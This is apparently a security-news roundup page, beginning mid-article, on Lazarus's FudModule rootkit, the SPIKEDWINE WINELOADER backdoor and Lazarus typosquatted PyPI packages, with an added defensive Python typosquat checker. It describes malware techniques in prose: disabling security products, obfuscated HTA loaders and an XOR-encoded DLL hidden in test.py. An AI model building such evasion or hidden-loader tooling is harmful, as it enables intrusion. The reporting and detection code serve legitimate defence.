Besides taking steps to sidestep detection by disabling system loggers, FudModule is engineered to turn off specific security software such as AhnLab V3 Endpoint Security, CrowdStrike Falcon, HitmanPro, and Microsoft Defender Antivirus (formerly Windows Defender).
The development marks a new level of technical sophistication for North Korean hacking groups, which continuously iterate their arsenal for improved stealth and functionality. It also illustrates the elaborate techniques employed to hinder detection and make their tracking much harder.
The adversarial collective's cross-platform focus is also exemplified by the fact that it has been observed using bogus calendar meeting invite links to stealthily install malware on Apple macOS systems, a campaign that was previously documented by SlowMist in December 2023.
"Lazarus Group remains among the most prolific and long-standing advanced persistent threat actors," Vojtěšek said. "The FudModule rootkit serves as the latest example, representing one of the most complex tools Lazarus holds in their arsenal."
New Backdoor Targeting European Officials Linked to Indian Diplomatic Events
1.3.24
Virus
The Hacker News
A previously undocumented threat actor dubbed SPIKEDWINE has been observed targeting officials in European countries with Indian diplomatic missions using a new backdoor called WINELOADER.
The adversary, according to a report from Zscaler ThreatLabz, used a PDF file in emails that purported to come from the Ambassador of India, inviting diplomatic staff to a wine-tasting event on February 2, 2024.
The PDF document was uploaded to VirusTotal from Latvia on January 30, 2024. That said, there is evidence to suggest that this campaign may have been active at least since July 6, 2023, going by the discovery of another similar PDF file uploaded from the same country.
"The attack is characterized by its very low volume and the advanced tactics, techniques, and procedures (TTPs) employed in the malware and command-and-control (C2) infrastructure," security researchers Sudeep Singh and Roy Tay said.
Central to the novel attack is the PDF file that comes embedded with a malicious link that masquerades as a questionnaire, urging the recipients to fill it out in order to participate. Clicking on the link paves the way for an HTML application ("wine.hta") that contains obfuscated JavaScript code to retrieve an encoded ZIP archive bearing WINELOADER from the same domain.
The malware is packed with a core module that's designed to execute modules from the C2 server, inject itself into another dynamic-link library (DLL), and update the sleep interval between beacon requests.
A notable aspect of the cyber incursions is the use of compromised websites for C2 and hosting intermediate payloads. It's suspected that the "C2 server only responds to specific types of requests at certain times," thereby making the attacks more evasive.
"The threat actor put additional effort into remaining undetected by evading memory forensics and automated URL scanning solutions," the researchers said.
Lazarus Exploits Typos to Sneak PyPI Malware into Dev Systems
1.3.24
Virus
The Hacker News
The notorious North Korean state-backed hacking group Lazarus uploaded four packages to the Python Package Index (PyPI) repository with the goal of infecting developer systems with malware.
The packages, now taken down, are pycryptoenv, pycryptoconf, quasarlib, and swapmempool. They have been collectively downloaded 3,269 times, with pycryptoconf accounting for the most downloads at 1,351.
"The package names pycryptoenv and pycryptoconf are similar to pycrypto, which is a Python package used for encryption algorithms in Python," JPCERT/CC researcher Shusei Tomonaga said. "Therefore, the attacker probably prepared the malware-containing malicious packages to target users' typos in installing Python packages."
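The naming trick described here, a popular name with a few characters added or changed, is mechanical enough to check for before a package is ever installed. The following is an added example, not JPCERT/CC's or PyPI's code, that audits a constructed requirements list against a small list of popular package names using PEP 503 name normalisation, edit distance and a suffix check; the popular-package list, the thresholds and the requirements file are assumptions made for the example, while pycryptoenv, pycryptoconf and quasarlib are the names reported on the page.

```python
import re

# Constructed list of popular package names. In practice, feed this from a
# top-downloads list or your organisation's approved-package inventory.
POPULAR_PACKAGES = {"pycrypto", "requests", "numpy", "cryptography", "urllib3"}


def normalize(name):
    """PEP 503 normalisation: case-fold and collapse runs of '-', '_' and '.' to '-'."""
    return re.sub(r"[-_.]+", "-", name).lower()


def levenshtein(a, b):
    """Classic edit distance (insert/delete/substitute cost 1)."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def typosquat_hits(name, popular=POPULAR_PACKAGES, max_distance=2, max_suffix=4):
    """Return [(popular_name, reason)] for popular packages this name resembles.

    Two heuristics: a small edit distance (catches 'requets'), and a popular
    name with a short suffix glued on (catches 'pycryptoenv', 'pycryptoconf').
    """
    n = normalize(name)
    normalized_popular = {normalize(p): p for p in popular}
    if n in normalized_popular:
        return []                                  # it is the popular package itself
    hits = []
    for q, p in sorted(normalized_popular.items()):
        d = levenshtein(n, q)
        if d <= max_distance:
            hits.append((p, f"edit distance {d}"))
        elif n.startswith(q) and len(n) - len(q) <= max_suffix:
            hits.append((p, f"appends '{n[len(q):]}' to the popular name"))
    return hits


def audit_requirements(text):
    """Return {requirement_name: hits} for every line that resembles a popular package."""
    flagged = {}
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()     # drop comments and blank lines
        if not line:
            continue
        name = re.split(r"[=<>!~\[; ]", line, maxsplit=1)[0]
        hits = typosquat_hits(name)
        if hits:
            flagged[name] = hits
    return flagged


# Constructed requirements file mixing genuine names, the page's reported
# package names and one constructed one-character typo.
SAMPLE_REQUIREMENTS = """\
requests==2.31.0
pycryptoenv          # reported on the page
pycryptoconf==1.0    # reported on the page
numpy>=1.26
requets==2.31.0      # constructed typo of 'requests'
quasarlib            # reported on the page; not close to anything in our list
"""


if __name__ == "__main__":
    for name, hits in audit_requirements(SAMPLE_REQUIREMENTS).items():
        for popular, reason in hits:
            print(f"{name}: resembles {popular} ({reason})")
```

The suffix rule is the one that matters for this campaign: "pycryptoenv" is three edits away from "pycrypto", beyond what a distance threshold alone would catch, yet it is precisely the kind of name a hurried developer types or accepts from an autocomplete. Note that quasarlib and swapmempool do not trip either heuristic against this small list, which is the limitation of any name-based check: it only covers the popular names you enumerate.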
The disclosure comes days after Phylum uncovered several rogue packages on the npm registry that have been used to single out software developers as part of a campaign codenamed Contagious Interview.
An interesting commonality between the two sets of attacks is that the malicious code is concealed within a test script ("test.py"). In this case, however, the test file is merely a smokescreen for what's an XOR-encoded DLL file, which, in turn, creates two DLL files named IconCache.db and NTUSER.DAT.
The attack sequence then uses NTUSER.DAT to load and execute IconCache.db, a malware called Comebacker that's responsible for establishing connections with a command-and-control (C2) server to fetch and run a Windows executable file.
JPCERT/CC said the packages are a continuation of a campaign that Phylum first detailed in November 2023 as leveraging crypto-themed npm modules to deliver Comebacker.
"Attackers may be targeting users' typos to have the malware downloaded," Tomonaga said. "When you install modules and other kinds of software in your development environment, please do so carefully to avoid installing unwanted packages."